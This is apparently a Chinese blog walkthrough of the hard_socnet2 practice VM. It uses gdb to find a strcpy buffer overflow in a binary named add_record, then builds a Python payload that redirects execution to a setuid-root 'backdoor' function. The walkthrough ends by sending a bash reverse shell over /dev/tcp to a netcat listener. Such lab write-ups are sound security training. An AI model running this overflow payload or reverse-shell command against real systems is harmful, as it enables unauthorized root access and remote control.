0x0804886f <+407>: call 0x8048480 <printf@plt>
0x08048874 <+412>: add esp,0x20
0x08048877 <+415>: mov ecx,DWORD PTR [ebp-0x48]
0x0804887a <+418>: mov edx,DWORD PTR [ebp-0x44]
0x0804887d <+421>: mov eax,DWORD PTR [ebp-0x40]
0x08048880 <+424>: sub esp,0x4
0x08048883 <+427>: lea esi,[ebp-0xac]
0x08048889 <+433>: push esi
0x0804888a <+434>: push ecx
0x0804888b <+435>: push edx
0x0804888c <+436>: push eax
0x0804888d <+437>: lea eax,[ebp-0x39]
0x08048890 <+440>: push eax
0x08048891 <+441>: lea eax,[ebx-0x12ec]
0x08048897 <+447>: push eax
0x08048898 <+448>: push DWORD PTR [ebp-0x1c]
0x0804889b <+451>: call 0x8048510 <fprintf@plt>
0x080488a0 <+456>: add esp,0x20
0x080488a3 <+459>: sub esp,0xc
0x080488a6 <+462>: push DWORD PTR [ebp-0x1c]
0x080488a9 <+465>: call 0x80484c0 <fclose@plt>
0x080488ae <+470>: add esp,0x10
0x080488b1 <+473>: mov eax,0x0
0x080488b6 <+478>: lea esp,[ebp-0x10]
0x080488b9 <+481>: pop ecx
0x080488ba <+482>: pop ebx
0x080488bb <+483>: pop esi
0x080488bc <+484>: pop edi
0x080488bd <+485>: pop ebp
0x080488be <+486>: lea esp,[ecx-0x4]
0x080488c1 <+489>: ret
重点关注
call命令后的内容,一般是函数调用- 比如此段
0x08048729 <+81>: call 0x8048520 <fopen@plt>就是打开文件用的
- 比如此段
其中可疑的
0x08048834 <+348>: call 0x80486ad <vuln>可能是程序制作者编写的函数,一般带@的说明是内建的
使用
info func查看所有函数其中关键的函数
0x080484f0 system@plt0x08048530 setuid@plt
可疑的
0x08048676 backdoorbackdoor 有后门的意思0x080486ad vuln
使用
disas vuln查看 vuln 函数的汇编0x080486ad <+0>: push ebp
0x080486ae <+1>: mov ebp,esp
0x080486b0 <+3>: push ebx
0x080486b1 <+4>: sub esp,0x44
0x080486b4 <+7>: call 0x80488c2 <__x86.get_pc_thunk.ax>
0x080486b9 <+12>: add eax,0x168f
0x080486be <+17>: sub esp,0x8
0x080486c1 <+20>: push DWORD PTR [ebp+0x8]
0x080486c4 <+23>: lea edx,[ebp-0x3a]
0x080486c7 <+26>: push edx
0x080486c8 <+27>: mov ebx,eax
0x080486ca <+29>: call 0x80484d0 <strcpy@plt>
0x080486cf <+34>: add esp,0x10
0x080486d2 <+37>: nop
0x080486d3 <+38>: mov ebx,DWORD PTR [ebp-0x4]
0x080486d6 <+41>: leave
0x080486d7 <+42>: ret
- 其中缓冲区漏洞可能是
0x080486ca <+29>: call 0x80484d0 <strcpy@plt>造成
- 其中缓冲区漏洞可能是
在查看 backdoor
0x08048676 <+0>: push ebp
0x08048677 <+1>: mov ebp,esp
0x08048679 <+3>: push ebx
0x0804867a <+4>: sub esp,0x4
0x0804867d <+7>: call 0x80485b0 <__x86.get_pc_thunk.bx>
0x08048682 <+12>: add ebx,0x16c6
0x08048688 <+18>: sub esp,0xc
0x0804868b <+21>: push 0x0
0x0804868d <+23>: call 0x8048530 <setuid@plt>
0x08048692 <+28>: add esp,0x10
0x08048695 <+31>: sub esp,0xc
0x08048698 <+34>: lea eax,[ebx-0x13f8]
0x0804869e <+40>: push eax
0x0804869f <+41>: call 0x80484f0 <system@plt>
0x080486a4 <+46>: add esp,0x10
0x080486a7 <+49>: nop
0x080486a8 <+50>: mov ebx,DWORD PTR [ebp-0x4]
0x080486ab <+53>: leave
0x080486ac <+54>: ret
- 涉及大量的系统级函数
我们需要制作一个包含注入用的文件做为输入
python -c "import struct; print('aa\n1\n1\n1\n' + 'a' * 62 + struct.pack('I', 0x08048676))" > text
0x08048676是 backdoor 的起始位置struct.pack 函数是反置
0x08048676socnet@socnet2:~$ python -c "import struct; print('aa\n1\n1\n1\n' + 'a' * 62 + struct.pack('I', 0x08048676))" > text
< + 'a' * 62 + struct.pack('I', 0x08048676))" > text
socnet@socnet2:~$ ls
ls
add_record monitor.py peda-session-add_record.txt
employee_records.txt peda text
socnet@socnet2:~$ gdb -q ./add_record
gdb -q ./add_record
Reading symbols from ./add_record...(no debugging symbols found)...done.
gdb-peda$ break vuln
break vuln
Breakpoint 1 at 0x80486b1
gdb-peda$ r < text
- break vuln 是在 vuln 函数打断点调试
- 一直用
s下一步直到出现 backdoor
[-------------------------------------code-------------------------------------]
0x8048673 <frame_dummy+3>: pop ebp
0x8048674 <frame_dummy+4>: jmp 0x8048600 <register_tm_clones>
0x8048676 <backdoor>: push ebp
=> 0x8048677 <backdoor+1>: mov ebp,esp
0x8048679 <backdoor+3>: push ebx
0x804867a <backdoor+4>: sub esp,0x4
0x804867d <backdoor+7>: call 0x80485b0 <__x86.get_pc_thunk.bx>
0x8048682 <backdoor+12>: add ebx,0x16c6
[------------------------------------stack-------------------------------------]
0000| 0xffffdc5c ("aaaa")
0004| 0xffffdc60 --> 0xffffdc00 --> 0xffffdc1e ('a' <repeats 66 times>)
0008| 0xffffdc64 --> 0xffffdce0 --> 0x1
0012| 0xffffdc68 --> 0xffffdd28 --> 0x0
0016| 0xffffdc6c --> 0x80487ef (<main+279>: mov DWORD PTR [ebp-0x20],eax)
0020| 0xffffdc70 --> 0x0
0024| 0xffffdc74 --> 0x0
0028| 0xffffdc78 --> 0xc2
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048677 in backdoor ()
0x804868d <backdoor+23>: call 0x8048530 <setuid@plt>在 backdoor 23 开始调用<setuid@plt>
0xf7e29d10 <system>: sub esp,0xc
0xf7e29d13 <system+3>: mov eax,DWORD PTR [esp+0x10]
0xf7e29d17 <system+7>: call 0xf7f21c7d
0xf7e29d1c <system+12>: add edx,0x1982e4
0xf7e29d22 <system+18>: test eax,eax
[------------------------------------stack-------------------------------------]
0000| 0xffffdc40 --> 0x80486a4 (<backdoor+46>: add esp,0x10)
0004| 0xffffdc44 --> 0x8048950 ("/bin/bash")
0008| 0xffffdc48 ("aaaaaaaa\202\206\004\b", 'a' <repeats 12 times>)
0012| 0xffffdc4c ("aaaa\202\206\004\b", 'a' <repeats 12 times>)
0016| 0xffffdc50 --> 0x8048682 (<backdoor+12>: add ebx,0x16c6)
0020| 0xffffdc54 ('a' <repeats 12 times>)
0024| 0xffffdc58 ("aaaaaaaa")
0028| 0xffffdc5c ("aaaa")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0xf7e29d10 in system () from /lib32/libc.so.6
- 看到
"/bin/bash"已经内陷到system@plt此时的 bash 是 root 权限
观看完漏洞过程,使用是 cat text - | ./add_record
socnet@socnet2:~$ cat text - | ./add_record
cat text - | ./add_record
Welcome to Add Record application
Use it to add info about Social Network 2.0 Employees
id
id
uid=0(root) gid=1000(socnet) groups=1000(socnet),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
- 在 kali 再次开监听
nc -nvlp 6666 - 在漏洞内陷的 shell 使用
bash -i >& /dev/tcp/192.168.56.111/6666 0>&1反弹
结果
┌──(kali㉿kali)-[~/workspace]
└─$ nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.114] 46716
root@socnet2:~#
打靶结束
靶机: hard_socnet2的更多相关文章
- CTF线下防御战 — 让你的靶机变成“铜墙铁壁”
本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...
- Ms17-010进行WEB提权之实践下某培训靶机服务器
前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...
- metasploit利用漏洞渗透攻击靶机
1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...
- web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- Fowsniff: 1靶机入侵
一.信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018 ...
- digitalworld.local: MERCY靶机入侵
0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...
- Moonraker:1靶机入侵
0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: h ...
- FourAndSix: 2.01靶机入侵
0x01 前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: htt ...
- Typhoon-v1.02 靶机入侵
0x01 前言 Typhoon VM包含多个漏洞和配置错误.Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,后期利用步骤,信息收集和DNS ...
- Raven: 2靶机入侵
0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机.有四个flag需要找出.在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵. ...
随机推荐
- spring boot 整合mybatis 配置多数据源 数据源切换和多数据源的事务
因为项目中用到了多数据源 不可避免的会有各种各样的问题列一下最主要的问题: 1 如何配置多数据源???2 spring项目中多数据源无法切换???3 操作了2个或者2个以上数据库的数据无法保证事务的一 ...
- 动态类型语言 VS 静态类型语言
一. 运行期动态修改类型结构 动态编程语言是高级编程语言的一个类别,在计算机科学领域已被广泛应用.它是一类在运行时可以改变其结构的语言:例如新的函数.对象.甚至代码可以被引进,已有的函数可以被删除或是 ...
- equals && deepEquals
equals && deepEquals 本文分为以下几个部分 equals deepEquals 总结 equals 首先说明:这里说的 equals 是 java.util.Arr ...
- Native如何使用Tunnel Mode
mAudioSessionId = AudioSystem::newAudioUniqueId(AUDIO_UNIQUE_ID_USE_SESSION); mHwSync = AudioSystem: ...
- ASP.NET Core SignalR 概述
什么是 SignalR? ASP.NET Core SignalR 是一个开放源代码库,可用于简化向应用添加实时 Web 功能. 实时 Web 功能使服务器端代码能够将内容推送到客户端. 适合 Sig ...
- Nacos 源码环境搭建
最近在学习nacos,通过调式源码查看服务注册和发现流程和原理,本地部署naos源码需要一定的步骤,本文主要做nacos源码部署. nacos版本:2.1.1 下载源码 从github上下载源码到本地 ...
- Nacos 版本不一致报错: Request nacos server failed
在做微服务开发中,测试环境使用Nacos没有问题,但是生产环境服务启动一直报错: com.alibaba.nacos.api.exception.NacosException: Request nac ...
- proteus 器件名称被软件篡改bug的解决方案
proteus v7.8 器件名称被软件篡改bug 的解决方案 BUG描述 在做单片机实验时,发现从某一个时间保存的设计图文件开始,在添加新的电子元件时会出现部分旧元件的名称被捆绑替换为新元件的名称, ...
- new 和 delete 运算符
C++ 支持使用操作符 new 和 delete 来动态分配和释放对象. new 运算符调用特殊函数 operator new,delete 运算符调用特殊函数 operator delete. 如果 ...
- linux下后台运行程序
文章目录 背景 nohup命令 setsid命令 pm2 背景 后台运行程序的时候,如果退出当前的终端(session),你运行的所有程序(包括后台程序),都将被关闭. 原因是:你运行的程序都是你的终 ...